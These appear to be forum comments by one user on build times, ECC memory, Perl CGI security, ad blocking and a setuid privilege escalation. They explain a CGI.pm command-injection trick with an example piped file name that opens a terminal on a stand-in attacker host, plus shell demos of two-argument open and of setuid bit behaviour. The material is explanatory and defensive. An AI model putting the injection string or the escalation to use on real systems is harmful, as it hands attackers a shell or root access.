As it's opt-in, like Apple's version was, it should be genuinely useful and not nearly as scary as it could be. There's something nice about easy access to store, business, and review apps while shopping. I imagine Android will do even better, since it worries less about showing off the data it already knows about you. That's one of the reasons Google Now can do better than Siri. (Except for voice recognition. I don't know why Google needs me to say something 5 or 6 times before it understands me, while iOS only messes up occasionally.) While I understand the privacy concerns, this isn't really a new privacy issue, since Google already has the data and would just be showing it. That said, it probably also makes it more obvious to users just how much data Google really has.
Theoretically I might be able to improve it, but several of the links involved take ~30 minutes each, and while I can run several links or other parts of the build at the same time, I'd have to break the linking down too much. I did do a little of that by subdividing the linking into partial links of related code in archive libraries; it reduces the overall optimization but speeds up the linking. There's still some build-system overhead I could reduce. One of my largest savings came from switching the build system from nested makefiles to a monolithic one created by a hand-tuned generator. If I did it today, I'd probably look at CMake and Ninja.
I do have tricks that let developers test small changes to the code much more quickly, though, so it's hard to justify optimizing further at the moment.
I mostly just commented to note that slow compile times are still a real thing; I didn't really expect to get much into my tools work. Alas, multitasking is still a real thing as well, so compile time doesn't always equal break time as the linked XKCD comic implies; it equals switching gears to another task.
Yeah, I'm also really surprised that ECC hasn't become more mainstream. I once spent several weeks chasing down a "compiler / build system" bug that turned out to be a memory bit-flip error that had the misfortune to end up cached in the build-avoidance system for a fairly static source file. It's one of the reasons I like server-class build farms these days.
It's a C++ project with a large amount of optimization to ensure it fits in the tight memory requirements of an embedded system. It also has to compile a lot of the code multiple times, since it targets an embedded system with dissimilar nodes (different CPU/memory architectures, devices, etc.).
The software I support takes about an hour to compile with a 20-way parallel build on an enterprise-class server blade farm. Before I optimized and increased the parallelization of the build process, it used to take 10+ hours. Not every project compiles and links that quickly.
Old versions of articles are still viewable in the page history. I wonder if this is related to the bots I've seen recently that vandalize a page with "random" garbage and then immediately self-revert.
Old versions of CGI could be tricked into returning something besides a file handle from $cgi->param( 'file' ). I imagine the exploit worked by putting multiple "file" parameters in the request, where the first was a text string and the second an uploaded file. $cgi->upload and $cgi->param normally return arrays, but in scalar context they return just the first value. So $cgi->upload( 'file' ) would return a true value, but $cgi->param( 'file' ) would return the text string that came before the upload in the request.

Perl has two basic forms of the open function: the 2-argument and 3-argument versions. The 3-argument version works more like the C open system call, but the 2-argument version respects piping and redirect characters. So if you can get Perl to treat that user-controlled string as a piped "file name", say "xterm -display attacker.example.org |", and the script blindly opens it using the 2-argument form (hint: <...> uses the 2-argument form internally), then you can pretty much get the script to run whatever you want. It's one of the reasons CGI changed how uploaded files work in current versions, and why Perl handles <$var> differently than it used to. There's also the <<>> form, which uses the 3-argument open and always treats names as plain filenames rather than possible pipes.
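You can see the difference between the two open forms with a pair of one-liners; the piped string here is just an illustrative stand-in for the attacker-controlled value:

```shell
# Two-argument open parses the string: a trailing '|' means
# "run this as a command and read its output".
perl -e 'my $name = q{echo pwned |};
         open my $fh, $name or die "open: $!";
         print <$fh>;'
# prints "pwned" -- the command actually ran

# Three-argument open treats the same string as a literal filename,
# so nothing is executed; the open simply fails.
perl -e 'my $name = q{echo pwned |};
         open my $fh, q{<}, $name or die "open: $!";' || true
```

The second form fails with "No such file or directory" instead of spawning anything, which is exactly why the 3-argument style (and <<>>) is the safe choice for user-supplied names.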
CGI.pm is no longer included in core with the newest versions of Perl, and using alternatives was highly recommended even before its removal; see CGI::Alternatives for some options. Also, the above code seems to use an outdated approach to getting upload temporary file handles (CGI::param instead of CGI::upload). It also fails perlcritic, at least with the settings I use.
If I were using CGI, I'd probably write the above code closer to the following (dry-coded and untested, as I don't have the CGI module installed on my system):
#!/usr/bin/env perl
use strict;
use warnings;

use CGI;
use Carp;
use English qw{ -no_match_vars };
use Readonly;

Readonly my $BLOCK_SIZE => 1024;

my $cgi = CGI->new();
my ( $handle ) = $cgi->upload( q{file} );
if ( defined $handle ) {
    my $buffer;
    while ( my $bytes = $handle->read( $buffer, $BLOCK_SIZE ) ) {
        print { \*STDOUT } $buffer
            or croak q{I/O error: }, $ERRNO;
    }
} ## end if ( defined $handle )

1;
Actually the style of my code would be a little different as I like to "use common::sense;" instead of "use strict; use warnings;" and a few other details.
Modern Perl can be written fairly cleanly, especially if one follows good coding practices. Tools like perlcritic and perltidy can help out a lot.
In general I don't block ads, but if some site, JavaScript, or the like annoys me enough I will block it at the router. Currently I have some auto-play video scripts blocked, along with some scripts that randomly convert plain text into ad links, and for a while I blocked a tracker that really slowed down webpages. I've also occasionally blocked sites whose ads or behavior were too annoying. For example, I blocked Gizmodo a while back because of that stunt they pulled with TV remotes at some tech conference. In those cases, if I end up following a link for some news to a blocked site, I just search for the news and read the story elsewhere. (It's very rare that only one place will talk about something.)
I also don't have Flash installed (and have turned off a couple of video codecs that mostly just got used by autoplay videos) in my main browser, which occasionally causes some sites to show a message accusing me of running an ad blocker where the Flash ad would be. (I'm surprised at how many sites just assume that a desktop browser must have Flash or the like, and don't check which codecs are installed.)
electric company account (please break in and pay my bill for me!)
You might want to move electric company account up the list. Utility bills are often used as proof of address when verifying identity.
Since the article is talking about the UK guidelines here, check out this list.
Yeah, booting from media is harder than it used to be, though single-user mode and recovery partitions cover most of it anyway. (I actually run a netboot server myself, so at worst I just have to boot via the network.)
newgrp doesn't exit; it executes a child shell that replaces the newgrp process. It's within that shell that you have access to file descriptor 3.
As for why the file needs to be setuid: that's what the exploit takes advantage of. Normally, writing to a setuid file clears the setuid bit, but that doesn't happen when the writer is already root. Which means that, using the exploit (and some tricks to get out of append mode), someone can turn a setuid file into any program, and it will run as root when launched.
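The bit-clearing behaviour is easy to see from the shell; this sketch just uses a throwaway temp file, and what the second stat prints depends on who runs it:

```shell
f=$(mktemp)
chmod 4755 "$f"        # give the file the setuid bit
stat -c '%a' "$f"      # prints 4755
echo 'payload' >> "$f" # write to the setuid file...
stat -c '%a' "$f"      # ...an unprivileged write clears the bit (755);
                       # a write by root leaves it at 4755
rm -f "$f"
```

That asymmetry is the whole point: a root-owned writer quietly preserves the setuid bit while replacing the file's contents.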
New York... when civilization falls apart, remember, we were way ahead of you. - David Letterman